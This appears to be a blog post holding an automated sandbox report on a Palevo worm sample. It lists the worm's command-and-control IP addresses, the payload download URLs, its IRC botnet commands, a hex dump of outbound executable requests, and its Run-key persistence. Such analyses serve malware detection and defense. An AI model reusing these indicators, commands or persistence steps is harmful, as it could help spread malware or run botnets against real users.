67.43.236.68(Palevo worm)

Remote Host Port Number
67.43.236.68 1863
98.126.28.121 80

* The data identified by the following URLs was then requested from the remote web server:
o http://host3.idfc2.info/fdc2.exe
o http://host3.idfc2.info/fdc1.exe

USER cakzts cakzts cakzts :vyrkvehxejzvjqvi
NICK obpHQJTST
MODE obpHQJTST +xi
JOIN #rstn3
USERHOST obpHQJTST
MODE ##a +smntu
MODE ##b +smntu
MODE ##c +smntu
MODE #rstn3 +smntu

There was an outbound traffic produced on port 80:

00000000 | 4745 5420 2F6B 6F6B 2E65 7865 2048 5454 | GET /kok.exe HTT
00000010 | 502F 312E 300D 0A48 6F73 743A 2068 6F73 | P/1.0..Host: hos
00000020 | 7433 2E69 6466 6332 2E69 6E66 6F0D 0A0D | t3.idfc2.info…
00000030 | 0A47 4554 202F 3434 2E65 7865 2048 5454 | .GET /44.exe HTT
00000040 | 502F 312E 300D 0A48 6F73 743A 2068 6F73 | P/1.0..Host: hos
00000050 | 7433 2E69 6466 6332 2E69 6E66 6F0D 0A0D | t3.idfc2.info…
00000060 | 0A

* The following ports were open in the system:

Port Protocol Process
1052 TCP logon.exe (%System%logon.exe)
10801 TCP logon.exe (%System%logon.exe)

Registry Modifications

* The following Registry Key was created:
o HKEY_CURRENT_USERSoftwarebcrypt

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
+ Windows Logon Application = “%System%logon.exe”

so that logon.exe runs every time Windows starts
o [HKEY_CURRENT_USERSoftwarebcrypt]
+ i = 0x000007D9

Memory Modifications

* There was a new process created in the system:

Process Name Process Filename Main Module Size
logon.exe %System%logon.exe 131 072 bytes

Categories: Uncategorized